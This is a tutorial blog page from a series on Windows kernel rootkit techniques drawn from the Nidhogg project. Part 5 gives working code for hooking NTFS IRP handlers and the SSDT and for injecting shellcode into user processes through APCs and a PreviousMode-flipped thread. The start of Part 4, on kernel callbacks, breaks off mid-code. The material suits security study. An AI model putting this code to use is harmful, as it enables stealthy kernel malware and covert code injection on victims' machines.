Ido Veltzman - Security Blog

Lord Of The Ring0 - Part 5 | Saruman’s Manipulation

19 July 2023 at 00:00

Prologue

In the last blog post, we learned about the different types of kernel callbacks and created our registry protector driver.

In this blog post, I’ll explain two common hooking methods (IRP Hooking and SSDT Hooking) and two different injection techniques from the kernel to the user mode for both shellcode and DLL (APC and CreateThread) with code snippets and examples from Nidhogg.

IRP Hooking

Side note: This topic (and more) was also covered in my talk “(Lady)Lord Of The Ring0” - feel free to check that out!

IRP Reminder

This is a quick reminder from the 2nd part; if you remember what an IRP is, you can skip to the next section.

“An I/O request packet (IRP) is the basic I/O manager structure used to communicate with drivers and to allow drivers to communicate with each other. A packet consists of two different parts:

  • Header, or fixed part of the packet — This is used by the I/O manager to store information about the original request.
  • I/O stack locations — Stack location contains the parameters, function codes, and context used by the corresponding driver to determine what it is supposed to be doing.” - Microsoft Docs.

In simple words, IRP allows kernel developers to communicate either from user mode to kernel mode or from one kernel driver to another. Each time a certain IRP is sent, the corresponding function in the dispatch table is executed. The dispatch table (or MajorFunction) is a member inside the DRIVER_OBJECT that contains the mapping between the IRP and the function that should handle the IRP. The general signature for a function that handles IRP is:

NTSTATUS IrpHandler(PDEVICE_OBJECT DeviceObject, PIRP Irp);

To handle an IRP, the developer needs to add their function to the MajorFunction table as follows:

DriverObject->MajorFunction[IRP_CODE] = IrpHandler;

Several notable IRPs (some of them we used previously in this series) are:

  • IRP_MJ_DEVICE_CONTROL - Used to handle communication with the driver.

  • IRP_MJ_CREATE - Used to handle Zw/NtOpenFile calls to the driver.

  • IRP_MJ_CLOSE - Used to handle (among other things) Zw/NtClose calls to the driver.

  • IRP_MJ_READ - Used to handle Zw/NtReadFile calls to the driver.

  • IRP_MJ_WRITE - Used to handle Zw/NtWriteFile calls to the driver.

Implementing IRP Hooking

IRP hooking is very similar to IAT hooking in a way, as both of them are about replacing a function in a table and deciding whether to call the original function or not (usually, the original function will be called).

In IRP hooking the malicious driver replaces an IRP handler of another driver with their handler. A common example is to hook the IRP_MJ_CREATE handler of the NTFS driver to prevent file opening.
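To make the table-replacement idea concrete before looking at the real driver code, here is a minimal user-mode sketch. Everything in it (FakeDriver, FakeIrp, the handler names and the "protected" file name check) is a hypothetical stand-in for illustration and is not part of Nidhogg or the WDK; it only shows the save-original, replace-entry, forward-or-block flow.

```cpp
#include <cstdint>
#include <string>

// Hypothetical user-mode stand-ins for NTSTATUS, IRP and DRIVER_OBJECT.
using Status = std::uint32_t;
constexpr Status kSuccess = 0x00000000;
constexpr Status kAccessDenied = 0xC0000022; // same numeric value as STATUS_ACCESS_DENIED

struct FakeIrp {
    std::string fileName;
};

using Handler = Status (*)(FakeIrp&);

constexpr int kMajorCreate = 0; // plays the role of IRP_MJ_CREATE
constexpr int kMajorCount = 4;

struct FakeDriver {
    Handler majorFunction[kMajorCount];
};

// The original handler is saved here so the hook can forward to it.
static Handler g_originalCreate = nullptr;

Status OriginalCreate(FakeIrp&) {
    return kSuccess;
}

// The hook decides whether to block the request or call the original handler.
Status HookedCreate(FakeIrp& irp) {
    if (irp.fileName.find("protected") != std::string::npos)
        return kAccessDenied;
    return g_originalCreate(irp);
}

// Saves the current table entry and replaces it with the hook.
void InstallHook(FakeDriver& driver) {
    g_originalCreate = driver.majorFunction[kMajorCreate];
    driver.majorFunction[kMajorCreate] = HookedCreate;
}
```

After InstallHook runs, every caller that goes through the table reaches HookedCreate first, which is the same property the real hook relies on.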

As an example, I will show the NTFS IRP_MJ_CREATE hook from Nidhogg:

NTSTATUS InstallNtfsHook(int irpMjFunction) {
    UNICODE_STRING ntfsName;
    PDRIVER_OBJECT ntfsDriverObject;
    NTSTATUS status = STATUS_SUCCESS;

    RtlInitUnicodeString(&ntfsName, L"\\FileSystem\\NTFS");
    status = ObReferenceObjectByName(&ntfsName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL, (PVOID*)&ntfsDriverObject);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to get ntfs driver object, (0x%08X).\n", status));
        return status;
    }

    switch (irpMjFunction) {
        case IRP_MJ_CREATE: {
            // Saving the original IRP handler into a callback array.
            Callbacks[0].Address = (PVOID)InterlockedExchange64((LONG64*)&ntfsDriverObject->MajorFunction[IRP_MJ_CREATE], (LONG64)HookedNtfsIrpCreate);
            Callbacks[0].Activated = true;
            KdPrint((DRIVER_PREFIX "Switched addresses\n"));
            break;
        }
        default:
            status = STATUS_NOT_SUPPORTED;
    }

    ObDereferenceObject(ntfsDriverObject);
    return status;
}

The first step in IRP hooking is to obtain the target's DriverObject, because it stores the MajorFunction table (as mentioned before). This can be done with ObReferenceObjectByName and the object name of the NTFS driver (\FileSystem\NTFS).

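Once the DriverObject is obtained, it is just a matter of overwriting the original IRP_MJ_CREATE entry with InterlockedExchange64 (NOTE: InterlockedExchange64 is used rather than a plain assignment so that the pointer is replaced atomically and the previous handler is returned in the same step. A thread dispatching an IRP at that moment sees either the old or the new handler and never a partially written pointer, which prevents a potential BSOD and other problems).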
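The effect of the interlocked exchange can be illustrated in user mode with std::atomic, whose exchange member has the same "store the new value and return the old one in one step" behavior. This is only an analogy under that assumption; the handler names below are hypothetical.

```cpp
#include <atomic>

using Handler = int (*)(int);

int OriginalHandler(int x) { return x; }
int HookHandler(int x) { return -x; }

// Stores the replacement and returns the previous value as one atomic
// operation, so no reader can observe a half-written pointer and the
// caller always gets exactly the handler it displaced.
Handler SwapHandler(std::atomic<Handler>& slot, Handler replacement) {
    return slot.exchange(replacement);
}
```

Because the previous value comes back from the same operation, removing the hook later is just another SwapHandler call with the saved pointer.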

Hooking IRPs in 2023

Although this is a nice method, there is one major problem that keeps kernel developers from using it: Kernel Patch Protection (PatchGuard). As you can see here, when PatchGuard detects that the IRP function has been changed, it triggers a BSOD with the CRITICAL_STRUCTURE_CORRUPTION error code.

While bypassing this is possible with projects like this one, it is beyond the scope of this series.

SSDT Hooking

What is SSDT

SSDT (System Service Descriptor Table) is an array that contains the mapping between the syscall and the corresponding function in the kernel. The SSDT is accessible via nt!KiServiceTable in WinDBG or can be located dynamically via pattern searching.

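The syscall number is the index into this table. On x64, each entry does not hold an absolute address but a 32-bit value whose upper 28 bits are the function's offset relative to the table base, so the address is calculated as follows: functionAddress = KiServiceTable + (KiServiceTable[syscallIndex] >> 4).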
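As a worked example of the formula, the sketch below decodes entries from a fake table in user mode. The function names are hypothetical, and it assumes the x64 layout in which each entry is a signed 32-bit value with the relative offset in the upper 28 bits and the low 4 bits used for something else (commonly described as the count of stack arguments).

```cpp
#include <cstdint>

// Builds a table entry from a relative offset and the low 4 bits.
// Multiplication is used instead of << to stay well defined for negative offsets.
std::int32_t EncodeEntry(std::int32_t offset, std::uint32_t lowBits) {
    return offset * 16 + static_cast<std::int32_t>(lowBits & 0xF);
}

// functionAddress = tableBase + (table[index] >> 4)
// The shift is arithmetic on mainstream compilers (and guaranteed since C++20),
// so negative offsets, meaning functions located before the table, also work.
std::uintptr_t ResolveServiceAddress(const std::int32_t* table,
                                     std::uintptr_t tableBase,
                                     std::uint32_t index) {
    const std::intptr_t offset = table[index] >> 4;
    return tableBase + static_cast<std::uintptr_t>(offset);
}
```

The same decoding appears in GetSSDTFunctionAddress, where the table is read through a PLONG so that the shift keeps the sign of the offset.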

Implementing SSDT Hooking

SSDT hooking is when a malicious program changes the mapping of a certain syscall to point to its function. For example, an attacker can modify the NtCreateFile address in the SSDT to point to their own malicious NtCreateFile. To do that, several steps need to be made:

  • Find the address of SSDT.
  • Find the address of the wanted function in the SSDT by its syscall.
  • Change the entry in the SSDT to point to the malicious function.

To find the address of SSDT by pattern I will use the code below (the code has been modified a bit for readability, you can view the unmodified version here):

NTSTATUS GetSSDTAddress() {
    ULONG infoSize;
    PVOID ssdtRelativeLocation = NULL;
    PVOID ntoskrnlBase = NULL;
    PRTL_PROCESS_MODULES info = NULL;
    NTSTATUS status = STATUS_SUCCESS;
    UCHAR pattern[] = "\x4c\x8d\x15\xcc\xcc\xcc\xcc\x4c\x8d\x1d\xcc\xcc\xcc\xcc\xf7";

    // Getting ntoskrnl base.
    status = ZwQuerySystemInformation(SystemModuleInformation, NULL, 0, &infoSize);

    // ...

    PRTL_PROCESS_MODULE_INFORMATION modules = info->Modules;

    for (ULONG i = 0; i < info->NumberOfModules; i++) {
        if (NtCreateFile >= modules[i].ImageBase && NtCreateFile < (PVOID)((PUCHAR)modules[i].ImageBase + modules[i].ImageSize)) {
            ntoskrnlBase = modules[i].ImageBase;
            break;
        }
    }

    // ...

    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)ntoskrnlBase;

    // Finding the SSDT address.
    status = STATUS_NOT_FOUND;
    if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE)
        goto CleanUp;

    PFULL_IMAGE_NT_HEADERS ntHeaders = (PFULL_IMAGE_NT_HEADERS)((PUCHAR)ntoskrnlBase + dosHeader->e_lfanew);

    if (ntHeaders->Signature != IMAGE_NT_SIGNATURE)
        goto CleanUp;

    PIMAGE_SECTION_HEADER firstSection = (PIMAGE_SECTION_HEADER)(ntHeaders + 1);

    for (PIMAGE_SECTION_HEADER section = firstSection; section < firstSection + ntHeaders->FileHeader.NumberOfSections; section++) {
        if (strcmp((const char*)section->Name, ".text") == 0) {
            ssdtRelativeLocation = FindPattern(pattern, 0xCC, sizeof(pattern) - 1, (PUCHAR)ntoskrnlBase + section->VirtualAddress, section->Misc.VirtualSize, NULL, NULL);

            if (ssdtRelativeLocation) {
                status = STATUS_SUCCESS;
                ssdt = (PSYSTEM_SERVICE_DESCRIPTOR_TABLE)((PUCHAR)ssdtRelativeLocation + *(PULONG)((PUCHAR)ssdtRelativeLocation + 3) + 7);
                break;
            }
        }
    }

CleanUp:
    if (info)
        ExFreePoolWithTag(info, DRIVER_TAG);
    return status;
}

The code above finds the ntoskrnl base by looking for the loaded module whose address range contains NtCreateFile. Once the base of ntoskrnl is known, all that is left to do is to find the pattern within its .text section. The pattern matches a lea instruction that references the SSDT, and adding that instruction's relative offset (plus the instruction length of 7 bytes) to the match address gives the location of the SSDT.

To find a function, all that needs to be done is to find the syscall number of the desired function (alternatively, a hardcoded syscall number can be used, but that is bad practice for forward compatibility) and then access the right location in the SSDT (as mentioned here).
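The two building blocks used above, a wildcard byte search and the resolution of a RIP-relative operand, can be sketched in user mode as follows. FindPatternSketch is a hypothetical helper with a simplified signature and is not Nidhogg's FindPattern; the sketch also assumes a little-endian machine, which holds for x64.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Returns the first position where pattern matches; bytes equal to
// wildcard in the pattern match any byte in the haystack.
const std::uint8_t* FindPatternSketch(const std::uint8_t* haystack, std::size_t haystackSize,
                                      const std::uint8_t* pattern, std::size_t patternSize,
                                      std::uint8_t wildcard) {
    if (patternSize == 0 || haystackSize < patternSize)
        return nullptr;

    for (std::size_t i = 0; i + patternSize <= haystackSize; i++) {
        bool match = true;
        for (std::size_t j = 0; j < patternSize; j++) {
            if (pattern[j] != wildcard && haystack[i + j] != pattern[j]) {
                match = false;
                break;
            }
        }
        if (match)
            return haystack + i;
    }
    return nullptr;
}

// "4C 8D 15 disp32" is lea r10, [rip + disp32] and is 7 bytes long.
// RIP points at the next instruction, so target = instruction + 7 + disp32.
const std::uint8_t* ResolveRipRelative(const std::uint8_t* instruction) {
    std::int32_t displacement = 0;
    std::memcpy(&displacement, instruction + 3, sizeof(displacement));
    return instruction + 7 + displacement;
}
```

This mirrors the expression in GetSSDTAddress: the displacement is read at offset 3 of the match and 7 is added for the instruction length.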

PVOID GetSSDTFunctionAddress(CHAR* functionName) {
    KAPC_STATE state;
    PEPROCESS CsrssProcess = NULL;
    PVOID functionAddress = NULL;
    PSYSTEM_PROCESS_INFO originalInfo = NULL;
    PSYSTEM_PROCESS_INFO info = NULL;
    ULONG infoSize = 0;
    ULONG index = 0;
    UCHAR syscall = 0;
    HANDLE csrssPid = 0;
    NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, NULL, 0, &infoSize);

    // ...

    // Iterating the processes information until csrss.exe is found.
    while (info->NextEntryOffset) {
        if (info->ImageName.Buffer && info->ImageName.Length > 0) {
            if (_wcsicmp(info->ImageName.Buffer, L"csrss.exe") == 0) {
                csrssPid = info->UniqueProcessId;
                break;
            }
        }
        info = (PSYSTEM_PROCESS_INFO)((PUCHAR)info + info->NextEntryOffset);
    }

    if (csrssPid == 0)
        goto CleanUp;
    status = PsLookupProcessByProcessId(csrssPid, &CsrssProcess);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Attaching to the process's address space to be able to walk the PEB.
    KeStackAttachProcess(CsrssProcess, &state);
    PVOID ntdllBase = GetModuleBase(CsrssProcess, L"C:\\Windows\\System32\\ntdll.dll");

    if (!ntdllBase) {
        KeUnstackDetachProcess(&state);
        goto CleanUp;
    }
    PVOID ntdllFunctionAddress = GetFunctionAddress(ntdllBase, functionName);

    if (!ntdllFunctionAddress) {
        KeUnstackDetachProcess(&state);
        goto CleanUp;
    }

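    // Searching for the syscall number: the byte that follows the last mov eax opcode seen before the ret.
    // Note: syscall is a UCHAR, so only the low byte of the immediate is kept and numbers above 0xFF are truncated.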
    while (((PUCHAR)ntdllFunctionAddress)[index] != RETURN_OPCODE) {
        if (((PUCHAR)ntdllFunctionAddress)[index] == MOV_EAX_OPCODE) {
            syscall = ((PUCHAR)ntdllFunctionAddress)[index + 1];
        }
        index++;
    }
    KeUnstackDetachProcess(&state);

    if (syscall != 0)
        functionAddress = (PUCHAR)ssdt->ServiceTableBase + (((PLONG)ssdt->ServiceTableBase)[syscall] >> 4);

CleanUp:
    if (CsrssProcess)
        ObDereferenceObject(CsrssProcess);

    if (originalInfo) {
        ExFreePoolWithTag(originalInfo, DRIVER_TAG);
        originalInfo = NULL;
    }

    return functionAddress;
}

The code above finds csrss (a process that is always running and has ntdll loaded) and then finds the location of the function inside ntdll. After that, it searches for the last mov eax, <immediate> instruction before the ret to make sure it finds the syscall number. When the syscall number is known, all that needs to be done is to find the function address with the SSDT.
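For illustration, here is a user-mode sketch of pulling the syscall number out of a stub's bytes. It deliberately uses a different, stricter approach than the loop above: it assumes the common x64 stub prologue mov r10, rcx; mov eax, imm32 (bytes 4C 8B D1 B8) and reads the full 32-bit immediate. ExtractSyscallNumber is a hypothetical name, and a stub that was patched or laid out differently is simply rejected.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Returns true and stores the syscall number when the stub starts with
// "mov r10, rcx; mov eax, imm32"; returns false for any other byte layout.
bool ExtractSyscallNumber(const std::uint8_t* stub, std::size_t size, std::uint32_t* number) {
    static const std::uint8_t prologue[] = {0x4C, 0x8B, 0xD1, 0xB8};

    if (size < sizeof(prologue) + sizeof(std::uint32_t))
        return false;
    if (std::memcmp(stub, prologue, sizeof(prologue)) != 0)
        return false;

    // The 4 bytes after the B8 opcode are the little-endian immediate.
    std::memcpy(number, stub + sizeof(prologue), sizeof(*number));
    return true;
}
```

Reading all four bytes avoids truncating syscall numbers above 0xFF, and checking the prologue avoids mistaking an unrelated 0xB8 byte for the mov eax opcode.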

Hooking The SSDT in 2023

This method was abused heavily by rootkit developers and antimalware developers alike in the golden era of rootkits. The reason this method is no longer used is that PatchGuard monitors SSDT changes and crashes the machine if a modification is detected.

While this method cannot be used in modern systems without tampering with PatchGuard, throughout the years developers found other ways to hook syscalls as a substitute.

APC Injection

Explaining how APCs work is beyond the scope of this series, which is why I recommend reading Repnz’s series about APCs.

To inject a shellcode into a user mode process with an APC several conditions need to be met:

  • The thread should be alertable.
  • The shellcode should be accessible from the user mode.

NTSTATUS InjectShellcodeAPC(ShellcodeInformation* ShellcodeInfo) {
    OBJECT_ATTRIBUTES objAttr{};
    CLIENT_ID cid{};
    HANDLE hProcess = NULL;
    PEPROCESS TargetProcess = NULL;
    PETHREAD TargetThread = NULL;
    PKAPC ShellcodeApc = NULL;
    PKAPC PrepareApc = NULL;
    PVOID shellcodeAddress = NULL;
    NTSTATUS status = STATUS_SUCCESS;
    SIZE_T shellcodeSize = ShellcodeInfo->ShellcodeSize;

    HANDLE pid = UlongToHandle(ShellcodeInfo->Pid);
    status = PsLookupProcessByProcessId(pid, &TargetProcess);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Find APC suitable thread.
    status = FindAlertableThread(pid, &TargetThread);

    if (!NT_SUCCESS(status) || !TargetThread) {
        if (NT_SUCCESS(status))
            status = STATUS_NOT_FOUND;
        goto CleanUp;
    }

    // Allocate and write the shellcode.
    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    cid.UniqueProcess = pid;
    cid.UniqueThread = NULL;

    status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &cid);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    status = ZwAllocateVirtualMemory(hProcess, &shellcodeAddress, 0, &shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ);

    if (!NT_SUCCESS(status))
        goto CleanUp;
    shellcodeSize = ShellcodeInfo->ShellcodeSize;

    status = KeWriteProcessMemory(ShellcodeInfo->Shellcode, TargetProcess, shellcodeAddress, shellcodeSize, UserMode);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Create and execute the APCs.
    ShellcodeApc = (PKAPC)ExAllocatePoolWithTag(NonPagedPool, sizeof(KAPC), DRIVER_TAG);
    PrepareApc = (PKAPC)ExAllocatePoolWithTag(NonPagedPool, sizeof(KAPC), DRIVER_TAG);

    if (!ShellcodeApc || !PrepareApc) {
        status = STATUS_UNSUCCESSFUL;
        goto CleanUp;
    }

    // VOID PrepareApcCallback(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine, PVOID* NormalContext, PVOID* SystemArgument1, PVOID* SystemArgument2) {
    // UNREFERENCED_PARAMETER(NormalRoutine);
    // UNREFERENCED_PARAMETER(NormalContext);
    // UNREFERENCED_PARAMETER(SystemArgument1);
    // UNREFERENCED_PARAMETER(SystemArgument2);

    // KeTestAlertThread(UserMode);
    // ExFreePoolWithTag(Apc, DRIVER_TAG);
    // }
    KeInitializeApc(PrepareApc, TargetThread, OriginalApcEnvironment, (PKKERNEL_ROUTINE)PrepareApcCallback, NULL, NULL, KernelMode, NULL);

    // VOID ApcInjectionCallback(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine, PVOID* NormalContext, PVOID* SystemArgument1, PVOID* SystemArgument2) {
    // UNREFERENCED_PARAMETER(SystemArgument1);
    // UNREFERENCED_PARAMETER(SystemArgument2);
    // UNREFERENCED_PARAMETER(NormalContext);

    // if (PsIsThreadTerminating(PsGetCurrentThread()))
    //     *NormalRoutine = NULL;

    // ExFreePoolWithTag(Apc, DRIVER_TAG);
    // }
    KeInitializeApc(ShellcodeApc, TargetThread, OriginalApcEnvironment, (PKKERNEL_ROUTINE)ApcInjectionCallback, NULL, (PKNORMAL_ROUTINE)shellcodeAddress, UserMode, ShellcodeInfo->Parameter1);

    if (!KeInsertQueueApc(ShellcodeApc, ShellcodeInfo->Parameter2, ShellcodeInfo->Parameter3, FALSE)) {
        status = STATUS_UNSUCCESSFUL;
        goto CleanUp;
    }

    if (!KeInsertQueueApc(PrepareApc, NULL, NULL, FALSE)) {
        status = STATUS_UNSUCCESSFUL;
        goto CleanUp;
    }

    if (PsIsThreadTerminating(TargetThread))
        status = STATUS_THREAD_IS_TERMINATING;

CleanUp:
    if (!NT_SUCCESS(status)) {
        if (shellcodeAddress)
            ZwFreeVirtualMemory(hProcess, &shellcodeAddress, &shellcodeSize, MEM_DECOMMIT);
        if (PrepareApc)
            ExFreePoolWithTag(PrepareApc, DRIVER_TAG);
        if (ShellcodeApc)
            ExFreePoolWithTag(ShellcodeApc, DRIVER_TAG);
    }

    if (TargetProcess)
        ObDereferenceObject(TargetProcess);

    if (hProcess)
        ZwClose(hProcess);

    return status;
}

The code above opens a target process and searches for a thread that can be alerted. This can be done by examining the Alertable bit in the thread’s MiscFlags and the GUI bit in the thread’s ThreadFlags: if a thread is alertable and isn’t GUI related, it is suitable.

If the thread is suitable, two APCs are initialized: one for alerting the thread and another one to clean up the memory and execute the shellcode.

After the APCs are initialized, they are queued: first the APC that cleans up the memory and executes the shellcode, and then the APC that alerts the thread so that the shellcode is executed.
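The suitability check described above boils down to two bit tests. The sketch below shows that logic in user mode; the two masks are assumed placeholder values chosen for illustration, since the real bit positions (and the offsets of MiscFlags and ThreadFlags inside the thread structure) depend on the Windows build.

```cpp
#include <cstdint>

// Assumed, build-specific masks: placeholders for illustration only.
constexpr std::uint32_t kAlertableBit = 0x10; // hypothetical Alertable bit in MiscFlags
constexpr std::uint32_t kGuiThreadBit = 0x80; // hypothetical GUI bit in ThreadFlags

// A thread is a candidate when it is alertable and is not a GUI thread.
bool IsSuitableForApc(std::uint32_t miscFlags, std::uint32_t threadFlags) {
    const bool alertable = (miscFlags & kAlertableBit) != 0;
    const bool gui = (threadFlags & kGuiThreadBit) != 0;
    return alertable && !gui;
}
```

A thread enumeration routine would call a check like this for each thread of the target process and stop at the first match.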

CreateThread Injection

Injecting a thread into a user mode process from the kernel is similar to injecting from user mode, with the main difference being that there are sufficient privileges to create another thread inside that process. That can be achieved easily by changing the calling thread’s previous mode to KernelMode and restoring it once the thread has been created.

NTSTATUS InjectShellcodeThread(ShellcodeInformation* ShellcodeInfo) {
    OBJECT_ATTRIBUTES objAttr{};
    CLIENT_ID cid{};
    HANDLE hProcess = NULL;
    HANDLE hTargetThread = NULL;
    PEPROCESS TargetProcess = NULL;
    PVOID remoteAddress = NULL;
    SIZE_T shellcodeSize = ShellcodeInfo->ShellcodeSize;
    HANDLE pid = UlongToHandle(ShellcodeInfo->Pid);
    NTSTATUS status = PsLookupProcessByProcessId(pid, &TargetProcess);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    cid.UniqueProcess = pid;
    cid.UniqueThread = NULL;

    status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &cid);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    status = ZwAllocateVirtualMemory(hProcess, &remoteAddress, 0, &shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ);

    if (!NT_SUCCESS(status))
        goto CleanUp;
    shellcodeSize = ShellcodeInfo->ShellcodeSize;

    status = KeWriteProcessMemory(ShellcodeInfo->Shellcode, TargetProcess, remoteAddress, shellcodeSize, UserMode);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Making sure that for the creation the thread has access to kernel addresses and restoring the permissions right after.
    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    PCHAR previousMode = (PCHAR)((PUCHAR)PsGetCurrentThread() + THREAD_PREVIOUSMODE_OFFSET);
    CHAR tmpPreviousMode = *previousMode;
    *previousMode = KernelMode;
    status = NtCreateThreadEx(&hTargetThread, THREAD_ALL_ACCESS, &objAttr, hProcess, (PTHREAD_START_ROUTINE)remoteAddress, NULL, 0, NULL, NULL, NULL, NULL);
    *previousMode = tmpPreviousMode;

CleanUp:
    if (hTargetThread)
        ZwClose(hTargetThread);

    if (!NT_SUCCESS(status) && remoteAddress)
        ZwFreeVirtualMemory(hProcess, &remoteAddress, &shellcodeSize, MEM_DECOMMIT);

    if (hProcess)
        ZwClose(hProcess);

    if (TargetProcess)
        ObDereferenceObject(TargetProcess);

    return status;
}

Unlike the APC injection, the steps here are simple: after the process has been opened and the shellcode has been allocated and written to the target process, the current thread’s previous mode is changed to KernelMode, NtCreateThreadEx is called to create a thread inside the target process, and the original previous mode is restored right after.
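The save, change, call, restore sequence around NtCreateThreadEx can also be expressed as a scope guard, which restores the value on every exit path. The sketch below simulates this in user mode: FakeThread and the helper names are hypothetical, and only the KernelMode = 0 / UserMode = 1 values mirror the real MODE enumeration.

```cpp
// Hypothetical stand-in for the field at THREAD_PREVIOUSMODE_OFFSET.
struct FakeThread {
    char previousMode;
};

constexpr char kKernelMode = 0; // same value as KernelMode
constexpr char kUserMode = 1;   // same value as UserMode

// Sets the previous mode to kernel on construction and restores the
// saved value on destruction, even if the guarded code returns early.
class PreviousModeGuard {
public:
    explicit PreviousModeGuard(FakeThread& thread)
        : thread_(thread), saved_(thread.previousMode) {
        thread_.previousMode = kKernelMode;
    }
    ~PreviousModeGuard() { thread_.previousMode = saved_; }

    PreviousModeGuard(const PreviousModeGuard&) = delete;
    PreviousModeGuard& operator=(const PreviousModeGuard&) = delete;

private:
    FakeThread& thread_;
    char saved_;
};

// Runs fn while the previous mode is temporarily set to kernel.
template <typename Fn>
auto WithKernelPreviousMode(FakeThread& thread, Fn fn) -> decltype(fn()) {
    PreviousModeGuard guard(thread);
    return fn();
}
```

The design choice here is only about safety: keeping the window in which the previous mode is modified as small as possible, and never leaving it modified by accident.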

Conclusion

In this blog, we learned about two common hooking methods (IRP hooking and SSDT hooking) and two techniques for injecting code from the kernel into a user mode process (APC and CreateThread).

In the next blog, we will learn how to patch user mode memory from the kernel (and write a simple driver that performs an AMSI bypass to demonstrate it), how to hide ports and how to dump credentials from the kernel.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Lord Of The Ring0 - Part 4 | The call back home

24 February 2023 at 00:00

Prologue

In the last blog post, we learned some debugging concepts, understood what an IOCTL is and how to handle it, and started to learn how to validate the data that we get from user mode: data that cannot be trusted and where a handling mistake can cause a blue screen of death.

In this blog post, I’ll explain the different types of callbacks and we will write another driver to protect registry keys.

Kernel Callbacks

We started to talk about this subject in the 2nd part, so if you haven’t read it yet, read it here and come back, as this blog is based on the knowledge you have learned in the previous ones.

For starters, let’s see what type of callbacks we’re going to learn about today:

  • Pre / Post operations (registered with ObRegisterCallbacks, which we talked about in the 2nd part).
  • PsSet*NotifyRoutine.
  • CmRegisterCallbackEx.

Each of the mentioned callbacks has its own purpose, and the most important thing is to pick the right tool for the job, so for each type I will also give an example of how it can be used in different scenarios.

ObRegisterCallbacks

ObRegisterCallbacks is a function that allows you to register a callback of your choice for certain events (process, thread, and much more) before or after they’re happening. To register a callback you need to give the following structure:

typedef struct _OB_CALLBACK_REGISTRATION {
  USHORT                    Version;
  USHORT                    OperationRegistrationCount;
  UNICODE_STRING            Altitude;
  PVOID                     RegistrationContext;
  OB_OPERATION_REGISTRATION *OperationRegistration;
} OB_CALLBACK_REGISTRATION, *POB_CALLBACK_REGISTRATION;

Version MUST be OB_FLT_REGISTRATION_VERSION.

OperationRegistrationCount is the number of registered callbacks.

Altitude is a unique identifier in the form of a string with this pattern: #define OB_CALLBACKS_ALTITUDE L"XXXXX.XXXX", where X is a digit. It is mandatory to define one so the OS will be able to identify your driver and determine the load order. If you don’t define it, or if the Altitude isn’t unique, the registration will fail.

RegistrationContext is a driver-defined value that the system passes to your callback routines whenever they run. Note that it is not what you use to unregister: ObRegisterCallbacks returns a separate registration handle through its second parameter, and that handle is what is later passed to ObUnRegisterCallbacks.

Finally, OperationRegistration is an array that contains all of your registered callbacks. Every entry in it has this structure:

typedef struct _OB_OPERATION_REGISTRATION {
  POBJECT_TYPE                *ObjectType;
  OB_OPERATION                Operations;
  POB_PRE_OPERATION_CALLBACK  PreOperation;
  POB_POST_OPERATION_CALLBACK PostOperation;
} OB_OPERATION_REGISTRATION, *POB_OPERATION_REGISTRATION;

ObjectType is the type of object that you want to register for. Some of the most common types are *PsProcessType and *PsThreadType. It is worth mentioning that although you can enable more types (like IoFileObjectType), this will trigger PatchGuard and cause your computer to BSOD, so unless PatchGuard is disabled, enabling more types is strongly discouraged. If you still want to enable more types, you can do so by using this like so:

typedef struct _OBJECT_TYPE_TEMP
{
 struct _LIST_ENTRY TypeList;
 struct _UNICODE_STRING Name;
 VOID* DefaultObject;
 UCHAR Index;
 ULONG TotalNumberOfObjects;
 ULONG TotalNumberOfHandles;
 ULONG HighWaterNumberOfObjects;
 ULONG HighWaterNumberOfHandles;
 struct _OBJECT_TYPE_INITIALIZER_TEMP TypeInfo;
 struct _EX_PUSH_LOCK_TEMP TypeLock;
 ULONG Key;
 struct _LIST_ENTRY CallbackList;
} OBJECT_TYPE_TEMP, * POBJECT_TYPE_TEMP;

POBJECT_TYPE_TEMP ObjectTypeTemp = (POBJECT_TYPE_TEMP)*IoFileObjectType;
ObjectTypeTemp->TypeInfo.SupportsObjectCallbacks = 1;

Operations are the kinds of operations that you are interested in. It can be OB_OPERATION_HANDLE_CREATE and/or OB_OPERATION_HANDLE_DUPLICATE for a handle creation or duplication.

PreOperation is a callback that will be called before the handle is opened and PostOperation will be called after it is opened. In both cases, you are getting important information through OB_PRE_OPERATION_INFORMATION or OB_POST_OPERATION_INFORMATION, such as a pointer to the object, the type of the object, and what type of operation (OB_OPERATION_HANDLE_CREATE or OB_OPERATION_HANDLE_DUPLICATE) occurred; the post-operation information also contains the return status. The pre-operation callback must ALWAYS return OB_PREOP_SUCCESS (the post-operation callback returns nothing). To influence the outcome, change the values inside the operation information, such as the desired access, but do not return anything else.

After you registered this kind of callback, you can remove certain permissions from the handle (for example: If you don’t want to allow a process to be closed, you can just remove the PROCESS_TERMINATE permission as we did in part 2 of the series) or manipulate the object itself (if it is a process, you can change the EPROCESS structure).
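The permission-stripping idea is plain bit masking, which the following user-mode sketch shows. FakePreOperationInfo is a hypothetical, flattened stand-in for the information a pre-operation callback receives (in the real structure the desired access sits deeper, inside the create or duplicate handle parameters); only the numeric values of the access rights match the Windows definitions.

```cpp
#include <cstdint>

using AccessMask = std::uint32_t;
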